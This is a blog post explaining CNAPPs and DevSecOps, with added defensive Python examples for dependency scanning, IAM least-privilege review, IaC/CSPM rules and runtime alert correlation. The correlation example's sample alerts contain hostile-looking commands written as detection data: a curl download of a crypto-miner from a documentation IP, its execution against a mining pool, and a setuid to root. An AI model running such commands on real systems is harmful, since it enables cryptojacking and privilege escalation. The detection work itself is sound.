Cybersecurity and the State of the Modern Threat Landscape: A Deep Dive on CNAPPs

Introduction

As more organizations move to the cloud, there is a pressing need for robust cloud security solutions that keep pace with an ever-evolving threat landscape. Gartner, Inc.'s August 2021 report, Innovation Insight for Cloud-Native Application Protection Platforms, observes that many organizations have resorted to manually piecing together various DevSecOps tools to obtain a holistic view of their infrastructure and application risks. As the cloud security landscape evolves, security professionals keep developing new solutions and strategies to counter the advanced tactics of cyber criminals, and those solutions must be continuously improved to anticipate new attack and exploitation methods. One significant outcome of these efforts is the emergence of cloud-native application protection platforms (CNAPPs). This post explores the background and various aspects of this trend and what it means for organizations in this space.

Cloud Computing Adoption

Cloud computing is the delivery of computing services over the internet to enable faster innovation, flexible resources, and economies of scale. Cloud resources are typically offered on a pay-as-you-go basis, so you pay only for the services you consume, which lowers operating costs while letting you run infrastructure efficiently and scale seamlessly as business needs change.

Cloud computing resources include servers, databases, storage, networking, software, business analytics, and intelligence. Cloud services can be deployed on public clouds, private clouds, or hybrid clouds.

Cloud security is increasingly a major concern and top priority for organizations, particularly those running hybrid or multi-cloud environments. Organizations are rapidly moving mission-critical workloads to cloud platforms because of the flexibility and efficiency the cloud offers over traditional on-premises data centers.

Security breaches and malicious attacks on cloud environments are growing at least as fast, and threat vectors evolve every day. It is therefore imperative that businesses evaluate and understand the key security constructs of the cloud so they can implement the right tools and practices to protect hosted workloads, and mature those practices over time.

DevOps and DevSecOps Overview

Contrary to popular belief, DevOps is not a technology but a methodology for improving work throughout the software development lifecycle by promoting better communication and synergy between teams. DevOps represents a collaboration or shared approach to the tasks executed by an organization’s application development and IT operations teams.

One of the most widely adopted DevOps practices is CI/CD: Continuous Integration paired with Continuous Delivery or Continuous Deployment. Continuous Integration (CI) is the practice of regularly integrating all code changes into the main branch, automatically testing the changes, and automatically initiating a build. Continuous Delivery (CD) builds on CI to automate infrastructure provisioning and the application release process. The DevOps lifecycle covers every stage from the start of software development through delivery, maintenance, and security.

Some of the most critical stages of the DevOps lifecycle include planning and organization of the work to be done, designing and developing code, testing and verification, packaging applications and dependencies, vulnerability management, release management, infrastructure configuration, and performance monitoring post-deployment.

With security an integral part of the software development lifecycle, security testing must happen earlier in the development process. Finding issues early speeds up development while improving code quality.

DevSecOps ensures that DevOps teams appreciate and understand the security and compliance implications and requirements from the very project initiation to properly safeguard software integrity. DevSecOps can be implemented in various environments such as on-premises, cloud-native, or even in hybrid setups.

Through seamless integration of security into DevOps workflows, organizations can effectively achieve visibility and risk control needs necessary to meet complex security demands.

A comparison of DevOps and DevSecOps using Venn diagrams. The DevOps diagram shows the intersection of Development, IT Operations, and Application Delivery. The DevSecOps diagram adds Security to the mix, showing the intersection of Development, IT Operations, Application Delivery, and Security.

DevSecOps Lifecycle

Plan - Involves conducting security analysis and developing a plan outlining where, when, and how security testing will be conducted. Collaborative design tools such as IriusRisk can be leveraged for threat modelling.

Build - As developers progressively add code to the central source repository, DevSecOps build tooling can automate the security examination of the build output (artifacts). The most essential security activities here are software composition analysis (SCA), Static Application Security Testing (SAST), and unit tests. These tools are integrated into the existing DevOps CI/CD pipelines. It is also essential to review and scan third-party code dependencies for known vulnerabilities during this stage.

Additionally, code-centric tools help developers write better and more secure code: static code analysis, code review assistants, and pre-commit hooks. Further security tooling can be integrated into developers' Git workflows to trigger security tests or reviews on every commit and merge. Some of the most popular tools here are Checkmarx, SonarQube, and Snyk.
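The dependency-scanning step described for the Build stage, as an added example that is not code from the original post or from any of the tools named above. It reads a pinned lock file, matches each pin against advisory records with an introduced/fixed range (the shape OSV uses), and fails the build when a finding is at or above a chosen severity. The lock file content and the advisory records (ids EX-0001 to EX-0003) are constructed for illustration and are not real advisories; version comparison is simplified to dotted integers, where real tooling such as pip-audit or Snyk uses full PEP 440 semantics.

```python
"""Dependency (SCA) gate for a CI build: flag pinned third-party packages that
fall inside a known-vulnerable version range and fail the build on HIGH+.

Added example, not code from the original post. Lock file and advisories are
constructed; real pipelines pull advisories from OSV or a vendor feed."""

# Constructed lock-file content (requirements.txt style, exact pins only).
LOCK_FILE = """\
requests==2.19.1
urllib3==1.26.18
pyyaml==5.3.1
jinja2==3.1.4
"""

# Constructed advisory records shaped loosely like an OSV affected range
# (introduced <= version < fixed). IDs are placeholders, not real advisories.
ADVISORIES = [
    {"id": "EX-0001", "package": "requests", "severity": "HIGH",
     "introduced": "0", "fixed": "2.20.0"},
    {"id": "EX-0002", "package": "pyyaml", "severity": "CRITICAL",
     "introduced": "0", "fixed": "5.4"},
    {"id": "EX-0003", "package": "urllib3", "severity": "MEDIUM",
     "introduced": "0", "fixed": "1.26.5"},
]

SEVERITY_RANK = {"LOW": 1, "MEDIUM": 2, "HIGH": 3, "CRITICAL": 4}


def parse_version(text):
    """Dotted numeric version -> tuple for comparison.
    Simplified: handles '1.26.18', not PEP 440 pre-releases or epochs."""
    return tuple(int(part) for part in text.split("."))


def parse_lock(text):
    """Return {name: version} from 'name==version' lines; skip comments,
    blanks and anything that is not an exact pin."""
    pins = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "==" not in line:
            continue
        name, version = line.split("==", 1)
        pins[name.strip().lower()] = version.strip()
    return pins


def is_affected(version, advisory):
    """True when introduced <= version < fixed (OSV range semantics)."""
    v = parse_version(version)
    return parse_version(advisory["introduced"]) <= v < parse_version(advisory["fixed"])


def scan(lock_text, advisories):
    """Return (package, pinned_version, advisory) for every matching advisory."""
    pins = parse_lock(lock_text)
    findings = []
    for adv in advisories:
        pinned = pins.get(adv["package"].lower())
        if pinned is not None and is_affected(pinned, adv):
            findings.append((adv["package"], pinned, adv))
    return findings


def build_passes(findings, fail_on="HIGH"):
    """Gate policy: the build fails if any finding is at or above fail_on."""
    threshold = SEVERITY_RANK[fail_on]
    return all(SEVERITY_RANK[f[2]["severity"]] < threshold for f in findings)


if __name__ == "__main__":
    results = scan(LOCK_FILE, ADVISORIES)
    for pkg, ver, adv in results:
        print(f"{adv['severity']:8} {pkg}=={ver}: {adv['id']} (fixed in {adv['fixed']})")
    raise SystemExit(0 if build_passes(results) else 1)
```

The exit code is what makes this a gate rather than a report: the CI job fails on a non-zero status, so a pull request that pins a vulnerable version cannot merge until the pin is raised past the fixed version. The same check can run in a pre-commit hook against the lock file, which is the earliest point at which it can fire.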

DevOps and Cloud-Native Approach

As more organizations adopt cloud-native computing, the advantages of moving software development to the cloud grow. Building, testing, and deploying software in the cloud brings significant cost savings and faster shipping, and it frees DevOps teams to innovate rather than maintain infrastructure. Cloud-native application development is therefore increasingly the preferred approach, helped by more effective collaboration between DevOps teams.

Cloud-Native Applications

Cloud-native applications are typically architected as loosely coupled microservices that usually interact with each other via Application Programming Interfaces (APIs). These applications are usually developed via DevSecOps methodologies incorporating Continuous Integration and Continuous Delivery pipelines.

Most of these applications rely heavily on open-source code and libraries and are containerized and orchestrated using platforms such as Kubernetes. Once containerized, they are deployed onto programmatic cloud infrastructure, updated frequently, and managed with a bias toward immutability that discourages ad hoc changes to production workloads.

Cloud-Native Application Protection Platforms (CNAPPs)

Traditionally, comprehensively securing cloud-native applications required disparate tools from multiple vendors that were poorly integrated and built for cybersecurity professionals, with little regard for the DevOps teams who actually fix the issues.

Consequently, risk prioritization and remediation lacked context, which hurt the productivity of DevOps teams. Cloud-Native Application Protection Platforms address this by putting DevOps teams at the core of application risk management.

With a consolidated platform, greater visibility gained at runtime can feed back into development, and, conversely, visibility gained during development can be used to strengthen runtime protection.

In its simplest form, a CNAPP is a comprehensive software platform that simplifies monitoring, detection, and response to potential cloud security threats and vulnerabilities. CNAPPs achieve this by seamlessly integrating multiple disparate security protection capabilities into a single platform that can then identify, prioritize, promote collaboration, and facilitate remediation of risks cutting across the complex logical boundary of modern cloud-native applications.

CNAPPs enable various organizations to adopt DevSecOps to protect business-critical workloads and streamline operations. By consolidating multiple security capabilities in a single platform, CNAPPs yield overall visibility into potential risks linked to the deployed cloud infrastructure thus enabling security teams to quantify and proactively respond to various risks in the environment.

CNAPPs also reduce the human error inherent in managing multiple tools by removing the need to pass information between disparate platforms: security assessment, threat detection, and reporting are consolidated. Furthermore, by integrating a CNAPP into the CI/CD pipeline, Infrastructure-as-Code (IaC) misconfigurations can be identified and fixed ahead of time, preventing insecure deployments to the cloud.

CNAPP Capabilities and Coverage

Even though almost all CNAPP solutions provide multiple cloud security capabilities, the exact feature set is vendor-specific. The most common CNAPP features include:

Infrastructure-as-Code (IaC) Scanning - IaC tools define cloud architecture and services programmatically or in configuration files, and automate provisioning from those definitions. IaC scanning evaluates the definitions before they are applied, surfacing vulnerabilities and misconfigurations for proactive remediation.

Cloud Infrastructure Entitlement Management (CIEM) - Identity management is critical across cloud environments. CIEM interrogates your cloud configuration to unearth, and alert on, unnecessary or misconfigured access to resources. By detecting and reporting on access misconfigurations in the cloud, CIEM helps enforce the principle of least privilege for access to critical resources.
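The core CIEM computation, as an added example that is not code from the original post or from any CNAPP vendor: expand what an IAM policy grants (wildcards included), compare it with the actions the principal actually used, and emit a right-sized policy that keeps only the used actions. The action catalogue is a tiny constructed subset of AWS IAM action names, the policy is a constructed document in real IAM policy syntax, and the activity records are constructed CloudTrail-like (eventSource, eventName) pairs; a real tool would use the full action list, a look-back window of weeks, and the ARNs from the events.

```python
"""CIEM-style least-privilege analysis for one IAM principal: expand the
actions a policy grants, compare them with the actions observed in activity
logs, and emit a right-sized policy.

Added example, not from the original post or any vendor. Catalogue, policy
and activity records below are constructed for illustration."""

import fnmatch
import json

# Constructed subset of the IAM action catalogue (service:Action).
ACTION_CATALOGUE = [
    "s3:GetObject", "s3:PutObject", "s3:DeleteObject", "s3:ListBucket",
    "s3:DeleteBucket", "s3:PutBucketPolicy",
    "ec2:DescribeInstances", "ec2:DescribeVolumes", "ec2:RunInstances",
    "ec2:TerminateInstances",
    "iam:CreateUser", "iam:AttachUserPolicy", "iam:PassRole",
]

# Constructed policy attached to a build-server role (real IAM policy syntax).
POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["s3:*"], "Resource": "*"},
    {"Effect": "Allow", "Action": "ec2:Describe*", "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"}
  ]
}""")

# Constructed activity for the same role over the look-back window
# (CloudTrail-like eventSource/eventName pairs only).
ACTIVITY = [
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject"},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject"},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject"},
    {"eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances"},
]


def _as_list(value):
    """IAM allows a string or a list for Action and Resource."""
    return value if isinstance(value, list) else [value]


def granted_actions(policy, catalogue=ACTION_CATALOGUE):
    """Expand every Allow statement (wildcards included) against the catalogue.
    IAM matches action names case-insensitively, so both sides are lowered."""
    granted = set()
    for stmt in policy["Statement"]:
        if stmt["Effect"] != "Allow":
            continue
        for pattern in _as_list(stmt["Action"]):
            granted.update(a for a in catalogue
                           if fnmatch.fnmatchcase(a.lower(), pattern.lower()))
    return granted


def used_actions(activity):
    """Map CloudTrail-style events back to service:Action names.
    Caveat: actions evaluated inside another call (iam:PassRole during
    ec2:RunInstances) never appear as their own eventName, and S3 object
    events are data events that must be enabled to be logged at all."""
    return {f"{e['eventSource'].split('.')[0]}:{e['eventName']}" for e in activity}


def wildcard_on_all_resources(policy):
    """Allow statements pairing a wildcard action with Resource "*": the
    entitlement shape a CIEM report surfaces first."""
    return [stmt for stmt in policy["Statement"]
            if stmt["Effect"] == "Allow" and "*" in _as_list(stmt["Resource"])
            and any("*" in a for a in _as_list(stmt["Action"]))]


def unused_actions(policy, activity, catalogue=ACTION_CATALOGUE):
    """Granted but never observed: the excess a least-privilege review removes."""
    return granted_actions(policy, catalogue) - used_actions(activity)


def right_sized_policy(policy, activity, catalogue=ACTION_CATALOGUE):
    """Policy allowing only the actions observed in use. Resource stays "*"
    because these activity records carry no ARN; scoping it is the next step."""
    keep = sorted(granted_actions(policy, catalogue) & used_actions(activity))
    return {"Version": "2012-10-17",
            "Statement": [{"Effect": "Allow", "Action": keep, "Resource": "*"}]}


if __name__ == "__main__":
    print("wildcard statements:", len(wildcard_on_all_resources(POLICY)))
    print("unused:", sorted(unused_actions(POLICY, ACTIVITY)))
    print(json.dumps(right_sized_policy(POLICY, ACTIVITY), indent=2))
```

On this input the role holds nine distinct permissions and has used three; the six unused ones include `s3:DeleteBucket`, `s3:PutBucketPolicy` and `iam:PassRole`. The caveat in `used_actions` matters in practice: `iam:PassRole` shows as unused here because it is never logged as its own event, so an analyst must confirm from the `RunInstances` events whether the role was passed before removing it, which is exactly the kind of context a CIEM product adds on top of this basic set difference.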

Cloud Security Posture Management (CSPM) - The primary goal of CSPM is to catch misconfigurations before they propagate to production environments. CSPM not only provides visibility and alerting but also offers guided or automated remediation of the identified deficiencies to build a solid overall security posture. CSPM assesses your cloud estate against predefined rules to identify misconfigurations and enforces compliance through built-in and customizable industry standards and frameworks. CSPM can also be integrated into CI/CD pipelines so that new IaC configurations are checked against the same policies before they are deployed.
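The rule evaluation that both the IaC scanning and the CSPM descriptions above rely on, as a single added example that is not code from the original post or from any CNAPP vendor. Rules are data (resource type, severity, check, remediation hint) and run over a normalized resource list; here that list is built from a constructed excerpt in the shape of `terraform show -json` output, which is the shift-left case, and the same `evaluate()` is what a CSPM would run over resources enumerated from the cloud API. The resource names, the rule ids (SG-001, RDS-001, RDS-002, S3-001) and the handful of attributes modelled are illustrative.

```python
"""Policy-as-code checks of the kind an IaC scanner runs in CI and a CSPM
applies to the live estate: each rule inspects one resource type, and each
finding carries a severity and a remediation hint.

Added example, not code from the original post or any vendor. The plan is a
constructed excerpt shaped like `terraform show -json`; only a few
attributes are modelled."""

import json

PLAN = json.loads("""{
  "planned_values": {"root_module": {"resources": [
    {"address": "aws_security_group.bastion", "type": "aws_security_group",
     "values": {"name": "bastion", "ingress": [
       {"from_port": 22, "to_port": 22, "protocol": "tcp", "cidr_blocks": ["0.0.0.0/0"]},
       {"from_port": 443, "to_port": 443, "protocol": "tcp", "cidr_blocks": ["10.0.0.0/8"]}]}},
    {"address": "aws_db_instance.orders", "type": "aws_db_instance",
     "values": {"identifier": "orders", "publicly_accessible": true, "storage_encrypted": false}},
    {"address": "aws_s3_bucket.assets", "type": "aws_s3_bucket",
     "values": {"bucket": "assets", "acl": "public-read"}},
    {"address": "aws_s3_bucket.logs", "type": "aws_s3_bucket",
     "values": {"bucket": "logs", "acl": "private"}}
  ]}}
}""")


def normalise_plan(plan):
    """Flatten the root module and any child modules into
    (address, type, values) tuples; the rules never see Terraform structure."""
    found = []

    def walk(module):
        for res in module.get("resources", []):
            found.append((res["address"], res["type"], res.get("values") or {}))
        for child in module.get("child_modules", []):
            walk(child)

    walk(plan["planned_values"]["root_module"])
    return found


def open_to_world(values, port):
    """True when any ingress rule exposes `port` to 0.0.0.0/0 or ::/0.
    Protocol -1 means all ports in AWS, so it matches regardless of range."""
    for rule in values.get("ingress") or []:
        cidrs = set(rule.get("cidr_blocks") or []) | set(rule.get("ipv6_cidr_blocks") or [])
        all_ports = rule.get("protocol") == "-1"
        in_range = all_ports or (rule.get("from_port") or 0) <= port <= (rule.get("to_port") or 65535)
        if in_range and cidrs & {"0.0.0.0/0", "::/0"}:
            return True
    return False


# (rule id, resource type, severity, title, check, remediation hint)
RULES = [
    ("SG-001", "aws_security_group", "HIGH", "SSH (22) reachable from the internet",
     lambda v: open_to_world(v, 22),
     "limit cidr_blocks to trusted ranges or drop the rule in favour of SSM/bastion access"),
    ("RDS-001", "aws_db_instance", "HIGH", "database instance is publicly accessible",
     lambda v: v.get("publicly_accessible") is True,
     "set publicly_accessible = false and deploy into private subnets"),
    ("RDS-002", "aws_db_instance", "MEDIUM", "database storage is not encrypted at rest",
     lambda v: v.get("storage_encrypted") is False,  # null (unknown at plan time) is not flagged
     "set storage_encrypted = true"),
    ("S3-001", "aws_s3_bucket", "HIGH", "bucket ACL grants public read",
     lambda v: v.get("acl") in ("public-read", "public-read-write"),
     "set acl = \"private\" and add an aws_s3_bucket_public_access_block"),
]


def evaluate(resources, rules=RULES):
    """Run every rule against every resource of its type; return findings."""
    findings = []
    for address, rtype, values in resources:
        for rule_id, applies_to, severity, title, check, fix in rules:
            if rtype == applies_to and check(values):
                findings.append({"rule": rule_id, "resource": address, "severity": severity,
                                 "title": title, "remediation": fix})
    return findings


def gate(findings, fail_on=("HIGH", "CRITICAL")):
    """Pipeline gate: block the apply if any finding is at a blocking severity."""
    return not any(f["severity"] in fail_on for f in findings)


if __name__ == "__main__":
    results = evaluate(normalise_plan(PLAN))
    for f in results:
        print(f"{f['severity']:6} {f['rule']} {f['resource']}: {f['title']} -> {f['remediation']}")
    raise SystemExit(0 if gate(results) else 1)
```

Two points worth noting. Values that Terraform only knows after apply appear as null in the plan, so a rule written as `is False` will not fire on them; the CSPM pass over the live estate is what catches those, which is one reason the page argues for both development-time and cloud-side visibility. And because the rule set is shared, a finding means the same thing whether it came from the plan in CI or from the deployed account, which is what lets the runtime view feed back into development as described earlier.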

Cloud Workload Protection Platform (CWPP) - Cloud workloads include containers, VMs, databases, APIs, serverless functions, and orchestration platforms such as Kubernetes. CWPPs offer visibility into these workloads, detect underlying vulnerabilities and misconfigurations, and recommend corrective actions to mitigate risks and threats in production.

Data Security Posture Management (DSPM) - DSPM protects sensitive data residing in cloud environments. By identifying sensitive data, maintaining visibility over it, and correlating it with known risk factors, DSPM can understand data asset configurations, usage, and movement, surface attack paths to the data, and so allow proactive mitigation of the identified issues.

Kubernetes Security Posture Management (KSPM) - Kubernetes automates the deployment, scaling, and management of containerized applications. KSPM tools provide holistic security visibility into containers, clusters, and associated hosts by scanning Kubernetes environments to detect and report security vulnerabilities and misconfigurations. KSPM further ensures that Kubernetes security issues are surfaced early in development and mitigated promptly.

Cloud Service Network Security (CSNS) - CSNS tools offer real-time protection for cloud infrastructure. CSNS is a suite of tools such as Web Application Firewalls (WAF), Web Application and API Protection (WAAP), anti-DDoS services, TLS inspection, and more.

Cloud Detection and Response (CDR) - CDR provides real-time security monitoring within the cloud to detect and surface potential security issues and suspicious events. Critical events surfaced by CDR include remote code execution, crypto-mining, privilege escalation, malware, container escape, and more. CDR also correlates threats by combining real-time signals, activity, and logs to track adversary movement, so that the resulting actionable insights enable rapid response and limit potential impact.
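The correlation step described for CDR, as an added example that is not code from the original post or from any CNAPP vendor. Individual runtime alerts (a shell in a container, an outbound download, execution from /tmp, a setuid call) are each low-signal on their own; chaining them per container inside a time window produces one incident with a stage sequence and a severity. The alerts are constructed JSON lines loosely shaped like Falco output (rule name, priority, output_fields); the rule names, stage mapping, fifteen-minute window and the miner markers are illustrative, and 198.51.100.7 is a documentation address.

```python
"""CDR-style correlation: collapse a stream of runtime alerts into one incident
per container by chaining related stages inside a time window, so an analyst
sees "shell -> download -> miner -> setuid" rather than four unrelated alerts.

Added example, not code from the original post or any vendor. Alerts are
constructed JSON lines loosely shaped like Falco output."""

import json
from datetime import datetime, timedelta

ALERTS = """\
{"time":"2024-05-01T10:00:01Z","rule":"Terminal shell in container","priority":"Notice","output_fields":{"container.id":"7f3a","proc.cmdline":"sh"}}
{"time":"2024-05-01T10:00:30Z","rule":"Outbound connection from container","priority":"Notice","output_fields":{"container.id":"7f3a","proc.cmdline":"curl -o /tmp/kworker http://198.51.100.7/xmrig"}}
{"time":"2024-05-01T10:00:45Z","rule":"Execution from /tmp","priority":"Warning","output_fields":{"container.id":"7f3a","proc.cmdline":"/tmp/kworker -o stratum+tcp://198.51.100.7:3333 -u wallet"}}
{"time":"2024-05-01T10:01:10Z","rule":"Setuid to root","priority":"Warning","output_fields":{"container.id":"7f3a","proc.cmdline":"/tmp/kworker"}}
{"time":"2024-05-01T10:02:00Z","rule":"Outbound connection from container","priority":"Notice","output_fields":{"container.id":"1c9e","proc.cmdline":"curl https://pypi.org/simple/"}}
{"time":"2024-05-01T11:30:00Z","rule":"Terminal shell in container","priority":"Notice","output_fields":{"container.id":"7f3a","proc.cmdline":"bash"}}
"""

# Attack stages in kill-chain order; severity grows with the number of
# distinct stages evidenced in one cluster.
STAGES = ["initial_access", "tool_download", "execution", "cryptomining", "privilege_escalation"]
SEVERITY = {1: "LOW", 2: "MEDIUM", 3: "HIGH", 4: "CRITICAL", 5: "CRITICAL"}
MINER_MARKERS = ("xmrig", "stratum+tcp", "minerd")
WINDOW = timedelta(minutes=15)


def stage_of(alert):
    """Map one alert to the set of stages it evidences (possibly empty).
    Rule names drive most stages; cryptomining is content-based on the
    command line so it fires whichever rule caught the process."""
    rule = alert["rule"].lower()
    cmd = alert["output_fields"].get("proc.cmdline", "").lower()
    stages = set()
    if "shell in container" in rule:
        stages.add("initial_access")
    if "outbound" in rule and ("curl" in cmd or "wget" in cmd):
        stages.add("tool_download")
    if "execution from /tmp" in rule:
        stages.add("execution")
    if any(marker in cmd for marker in MINER_MARKERS):
        stages.add("cryptomining")
    if "setuid" in rule or "sudo" in rule:
        stages.add("privilege_escalation")
    return stages


def parse_alerts(text):
    """Parse JSON lines and sort by time; timestamps are UTC 'Z' strings."""
    alerts = []
    for line in text.splitlines():
        if line.strip():
            alert = json.loads(line)
            alert["_t"] = datetime.strptime(alert["time"], "%Y-%m-%dT%H:%M:%SZ")
            alerts.append(alert)
    return sorted(alerts, key=lambda a: a["_t"])


def correlate(alerts, window=WINDOW):
    """Group alerts per container, split the sequence wherever the gap to the
    previous alert exceeds `window`, and report clusters with 2+ stages."""
    per_entity = {}
    for alert in alerts:
        per_entity.setdefault(alert["output_fields"]["container.id"], []).append(alert)
    incidents = []
    for entity, items in per_entity.items():
        cluster = []
        for alert in items + [None]:  # None flushes the last cluster
            if alert is not None and (not cluster or alert["_t"] - cluster[-1]["_t"] <= window):
                cluster.append(alert)
                continue
            stages = set().union(*(stage_of(a) for a in cluster))
            if len(stages) >= 2:
                ordered = [s for s in STAGES if s in stages]
                incidents.append({"entity": entity, "stages": ordered,
                                  "severity": SEVERITY[len(ordered)],
                                  "first": cluster[0]["time"], "last": cluster[-1]["time"],
                                  "alerts": len(cluster)})
            cluster = [alert] if alert is not None else []
    return incidents


if __name__ == "__main__":
    for inc in correlate(parse_alerts(ALERTS)):
        print(f"{inc['severity']} container {inc['entity']}: {' -> '.join(inc['stages'])} "
              f"({inc['alerts']} alerts, {inc['first']} .. {inc['last']})")
```

On the sample, container 7f3a yields one CRITICAL incident covering all five stages from four alerts, the benign `curl` to a package index in container 1c9e yields nothing because it evidences a single stage, and the later shell in 7f3a at 11:30 starts a fresh cluster rather than being glued onto the earlier chain. Shrinking the window splits the chain into fragments, which is the trade-off a real CDR tunes: a long window links more stages but risks merging unrelated activity on a long-lived container.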

Below is a depiction of the evolution of the CNAPP risk landscape and the explosion of the risk surface area for cloud-native applications.

Developers are building ever more software and cloud infrastructure, and using Infrastructure-as-Code to set it up, which compounds the existing security situation. There is therefore an increasing need to shift security left in the development lifecycle and act on security issues much earlier in the pipeline, as new artifacts are created. A truly comprehensive CNAPP requires a combination of runtime risk visibility, cloud risk visibility, and development artifact risk visibility.

CNAPPs Deployment Approach

Strategic planning before the deployment of a CNAPP solution should focus on enhancing the developers’ experience as the primary goal. This should serve to reduce operational friction, promote better risk identification, and minimize false positives.

Remember that since the developers are the ultimate resource that will be involved in the remediation of the surfaced risks, the CNAPP evaluation team should include adequate representation from the DevOps side knowledgeable on cloud security, container security, and application security.

When choosing a CNAPP solution, bear in mind that no single vendor is best-of-breed in every CNAPP capability. Choose a vendor with a holistic understanding of the relationships between the different elements of a cloud-native application and their associated risks; this is what allows cloud control-plane risks and artifact risks to be combined so that the overall risk surface can be understood, prioritized, and remediated. Follow this with a thorough proof of concept, run jointly with the developers on real applications, before making the final decision and commitment to the chosen vendor.

During the rollout, focus first on cloud-native applications, since that is where development is fast-paced and risk identification is critical. Where deploying the full CNAPP capability set is not possible, prioritize the CSPM capability, which identifies most misconfigurations affecting cloud-native applications.

The most common sources of risk for cloud-native applications are the software composition: open-source libraries and other dependencies, containers, secrets, and gaps in access management. Security analysis of these should be prioritized.

Finally, be pragmatic when deploying a CNAPP. Agent-based deployment gives better runtime visibility but is not always possible; in those cases, consider agentless deployment to achieve runtime visibility.

The Future of CNAPPs

For a CNAPP solution to deliver against the vision of RiskOps, a deeper understanding of the relationships between the different elements of cloud-native applications is paramount. CNAPPs must be able to model application code, libraries, containers, scripts, configuration, and vulnerabilities to discover where the major risks reside.

Most vendors are increasingly focusing on identifying the relationship between development tools, developers, and artifacts they create. Some offer an intelligent risk-based approach to software composition analysis or application posture management. Others offer to deduplicate risk findings of multiple security and risk scanners to prioritize remediation efforts.

All in all, most of these vendors are not full CNAPP providers but over time, more capabilities will be adopted by larger CNAPP offerings. Currently, security teams have limited ways to assess the overall security posture of the protected information estate. As time goes by, CNAPPs will eventually become the standard way for development and security teams to sync on the security front. This will enable developers and cloud teams to visualize security differently and adopt the right steps to secure their applications and resources.

In conclusion, it is the responsibility of the organization to adopt a solid security strategy for adequate planning to ensure the choice of a CNAPP solution adequately addresses the needs and the drive for exploring such solutions.

References

https://www.wiz.io/academy/what-is-a-cloud-native-application-protection-platform-cnapp

https://www.techtarget.com/searchitoperations/definition/DevOps

https://about.gitlab.com/topics/devops/

crowdstrike.com/cybersecurity-101/cloud-sec..

https://www.gartner.com

Image sources: Gartner, author. (Too bad I couldn't caption them with Hashnode!)